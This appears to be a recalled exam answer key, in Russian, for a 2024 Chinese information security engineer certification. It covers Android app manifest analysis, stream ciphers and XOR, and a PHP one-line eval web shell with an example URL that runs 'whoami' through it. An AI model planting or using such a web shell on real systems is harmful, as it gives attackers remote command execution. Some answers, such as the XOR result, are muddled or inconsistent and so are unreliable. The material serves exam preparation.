
2024年信息安全工程师、2024InformationSecurityEngineer
Инженер по информационной безопасности 2024, 2024InformationSecurityEngineer
Время экзамена (软考) : 2024年11月08日
Каталог/файл хранения подписи ___ (2 балла) Ответ: META-INF
Каталог/файл хранения разрешений ___ (2 балла) Ответ: AndroidManifest.xml
Вопрос 5 (10 баллов) (1) Какая настройка поддерживает резервное копирование; (2) Можно ли читать исторические данные о местоположении, есть ли угрозы безопасности; (3) Какие из четырёх основных компонентов используются в конфигурационном файле; (4) Какой компонент имеет самый высокий риск утечки информации; (5) Имеет ли место злоупотребление информацией? Подробно объясните;
Ответ: (1) backup...... не поддерживает резервное копирование (2) Существует угроза: есть риск утечки неизвестной информации (3) Activity, BroadcastRecevier (4) Contentprovider (5) Имеет место злоупотребление информацией: разрешения на местоположение, камеру, хранилище, контакты, мультимедиа, Bluetooth и другие — многие из них являются чрезмерным сбором.
Имеет ли пользователь root-права в Android (2 балла) Ответ: нет
<?php @eval($_GET["cmd"]); ?> (5 баллов)
- Какой пароль подключения соответствует этому файлу Ответ: cmd
- Какой HTTP-метод запроса используется Ответ: GET
- Предположим, домен abc.com, полный URL-адрес для выполнения whoami Ответ: abc.com/shell.php?cmd=system("whoami")
- Помимо симметричного и асимметричного, как ещё можно шифровать в зависимости от способа обработки открытого текста (2 балла) Ответ: блочное шифрование и поточное шифрование
- 8-битное представление a (2 балла) Ответ: 97 ---》 01100001
- Результат XOR-шифрования a и abc (6 баллов) Ответ: 032 или 00000000 00000011 00000010
- Даны mi, ki, ci, как получить формулу открытого текста (2 балла) Ответ: mi = ki XOR ^ ci
- Безопасно ли шифровать два разных открытых текста одним и тем же ключом потокового шифра? Почему? (2 балла) Ответ: небезопасно, из одного открытого текста можно вывести другой
- Можно ли использовать блочный шифр в качестве потокового? (1 балл) Ответ: можно